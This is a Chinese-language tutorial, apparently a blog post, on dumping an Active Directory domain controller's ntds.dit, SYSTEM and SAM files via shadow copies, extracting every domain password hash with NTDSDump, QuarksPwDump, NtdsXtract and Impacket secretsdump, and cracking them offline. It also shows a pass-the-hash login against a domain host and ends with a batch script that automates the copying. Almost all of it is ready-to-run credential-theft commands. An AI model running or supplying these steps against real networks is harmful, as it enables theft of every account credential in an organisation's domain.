本文介绍多种方法用于备份Active Directory域数据库ntds.dit及其相关文件,并演示如何使用不同工具导出hash值,包括vssown.vbs、vshadow.exe、vssadmin等。
1.vsssown.vbs拷贝域数据库:
1.1上传vssown.vbs文件
上传cscript.exe和vssown.vbs到域服务器上
1.2创建快照
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NTDS\Parameters //得到ntds的默认路径:c:\ Windows\NTDS\ntds.dit
cd 桌面
cscript //nologo vssown.vbs /start //启用
cscript //nologo vssown.vbs /status //查看运行状态
cscript //nologo vssown.vbs /create C //在C盘下创建副本卷影
cscript //nologo vssown.vbs /list >d:\jy.txt //查看创建的快照信息并输出到d:\jy.txt
1.3获取域据库ntds.dit
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\windows\ntds\ntds.dit d: //拷贝ntds.dit到D盘,有时候ntds.dit不在默认路径,需要通过注册表查询到路径
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\windows\system32\config\SYSTEM d: //拷贝system到D盘
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\windows\system32\config\SAM d: //拷贝sam到D盘
cscript //nologo vssown.vbs /delete {B3475A72-86D2-48EC-A22F-6E8DBB82903D} //删除卷影
2.vshadow.exe拷贝域数据库:
vshadow.exe -exec=%ComSpec% C: //在C盘下创建副本卷影
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\windows\system32\config\system d:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\windows\ntds\ntds.dit d:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\windows\system32\config\SAM d:
3.vssadmin拷贝域数据库:
vssadmin create shadow /for=c: //在C盘下创建副本卷影
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\Windows\NTDS\ntds.dit d:\ntds.dit
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\Windows\System32\config\SYSTEM d:\system.hive
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\windows\system32\config\SAM d:\sam
4.NTDSDump导出域数据库hash值:
4.1 ntsdump命令帮助
ntdsdump.exe <-f ntds.dit> <-k HEX-SYS-KEY | -s system.hiv> [-o out.txt] [-h] [-t JOHN|LC]
-f ntds.dit路径
-k 可选的十六进制格式的SYSKEY
-s 可选的system.hiv路径
-h 导出历史密码记录
-t 导出格式,LC或JOHN
-o 导出到指定文件中
4.2 ntdsdump快速导出hash值
NTDSDump.exe -f ntds.dit -s SYSTEM -h -t john(或者lc) -o SecPulseHash.txt //快速导出HASH值
5.ntdsutil.exe + QuarksPwDump.exe导出hash值:
5.1quarkspwdump命令帮助
-dhl 导出本地哈希值
-dhdc导出内存中的域控哈希值
-dhd 导出域控哈希值,必须指定NTDS文件
-db 导出Bitlocker信息,必须指定NTDS文件
-nt 导出ntds文件
-hist 导出历史信息,可选项
-t 导出类型可选默认导出为John类型。
-o 导出文件到本地
QuarksPwDumpv0.2b.exe -dhl -o bk.txt //导出本地哈希值到当前目录的bk.tx
quarks-pwdump.exe --dump-hash-domain --with-history //导出本机域控历史存储的hash值
quarks-pwdump.exe --dump-bitlocker --output c:\bitlocker.txt --ntds-file c:\ntds.dit
5.2创建快照:
ntdsutil snapshot "activate instance ntds" create quit quit
5.3 Ntdsutil挂载域快照:
ntdsutil snapshot "mount{a0455f6c-40c3-4b56-80a0-80261471522c}" quit quit
快照 {5e0d92d3-992d-42b9-bbd5-9c85e5dc7827} 已掛接為 C:\$SNAP_201212082315_VOLUMEC$\
5.4 复制快照
copy C:\$SNAP_201212082315_VOLUMEC$\windows\NTDS\ntds.dit c:\ntds.dit
5.5 卸载快照:
ntdsutil snapshot "unmount{5e0d92d3-992d-42b9-bbd5-9c85e5dc7827}" quit quit
5.6 删除快照
ntdsutil snapshot "delete{5e0d92d3-992d-42b9-bbd5-9c85e5dc7827}" quit quit
ntsutil.exe +PWPR(Passcape Windows Password Recovery)
5.7ntdsutil导出ntds.dit和system
#ntdsutil
#snapshot
#activate instance ntds
#create
#mount {GUID}
copy c:\{挂载点}\WINDOWS\NTDS\NTDS.dit c:\NTDS_saved.dit (可手动复制)(新窗口复制)
copy c:\{挂载点}\WINDOWS\system32\config\system c:\system
#unmount {GUID}
#delete {GUID}
#quit
#quit
最后通过PWPR(Passcape Windows Password Recovery)的GPU本地在线破解hash值
5.7 域控上执行导出hash值:
QuarksPwDump.exe --dump-hash-domain --ntds-file c:\ntds.dit --output SecPulseHash.txt //建议在域控制器上执行,不然会下载下来出错
QuarksPwDump.exe -dhd -hist -nt ntds.dit -o log.txt //修复离线下载的ntds.dit
5.8 导出system文件
reg save hklm\system system.hive //导出system文件
5.9离线下载本地导出hash值
quarks-pwdump.exe --dump-hash-domain --ntds-file C:\pentest\NTDS.dit -sf C:\pentest\SYSTEM -o hashes.txt //离线导出ntds.dit的hash值
6.libesedb+ NtdsXtract导出域数据库hash值:
6.1 ubuntu上安装libesedb的先决条件:
sudo apt install autoconf automake autopoint libtool pkg-config //安装先决条件
6.2 安装libesedb:
git clone https://github.com/libyal/libesedb.git
cd libesedb/
./synclibs.sh
./autogen.sh
./configure
make
sudo make install //默认安装在/usr/local/bin下
ldconfig
6.3 分离ntds.dit数据库
root@kali:/usr/local/bin# esedbexport -m tables /opt/ntds.dit // 将ntds.dit和sam以及system下载到本地kali桌面中的hashdumpwork目录下,然后分离出数据表来,会在目录下生
成一个目录ntds.dit.export的文件夹
7.4安装NTDSXtract
wget https://github.com/csababarta/ntdsxtract/archive/e2fc6470cf54d9151bed394ce9ad3cd25be7c262.zip
unzip e2fc6470cf54d9151bed394ce9ad3cd25be7c262.zip
cd ntdsxtract-e2fc6470cf54d9151bed394ce9ad3cd25be7c262/
python setup.py install
7.5 ntds脚本导出hash值
root@kali:# python dsusers.py /usr/local/bin/ntds.dit.export/datatable.4 /usr/local/bin/ntds.dit.export/link_table.7 /root/Desktop/hashdumpwork --syshive /root/Desktop/SYSTEM --passwordhashes --lmoutfile /root/Desktop/lm-out.txt --ntoutfile /root/Desktop/nt-out.txt --pwdformat ophc(或者john)
7. Impacket's secretsdump导出域数据库hash值:
python secretsdump.py -ntds /opt/ntds.dit -system /opt/system.hive local
7.1 Impacket's secretsdump脚本域hash传递登录:
python secretsdump.py -hashes 0000000000000000000000000:f9bccbbbdkkkkkkddjjjkkjfjjggj bk/bk.org@192.168.1.100
8.附录
附录:批处理导出ntds.dit文件
setlocal
@REM test if we are called by VSHADOW
if NOT “%CALLBACK_SCRIPT%”==”” goto :IS_CALLBACK
@REM
@REM Get the source and destination path
@REM
set SOURCE_DRIVE_LETTER=%~d1
set SOURCE_RELATIVE_PATH=%~pnx1
set DESTINATION_PATH=%2
@REM
@REM Create the shadow copy – and generate env variables into a temporary script.
@REM
@REM Then, while the shadow is still live
@REM recursively execute the same script.
@REM
@echo …Determine the scripts to be executed/generated…
set CALLBACK_SCRIPT=%~dpnx0
set TEMP_GENERATED_SCRIPT=GeneratedVarsTempScript.cmd
@echo …Creating the shadow copy…
%~dp0\vshadow.exe -script=%TEMP_GENERATED_SCRIPT% -exec=%CALLBACK_SCRIPT% %SOURCE_DRIVE_LETTER%
del /f %TEMP_GENERATED_SCRIPT%
@goto :EOF
:IS_CALLBACK
setlocal
@REM
@REM This generated script should set the SHADOW_DEVICE_1 env variable
@REM
@echo …Obtaining the shadow copy device name…
call %TEMP_GENERATED_SCRIPT%
@REM
@REM This should copy the file to the right location
@REM
@echo …Copying from the shadow copy to the destination path…
copy “%SHADOW_DEVICE_1%\%SOURCE_RELATIVE_PATH%” %DESTINATION_PATH%
扫一扫
28
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
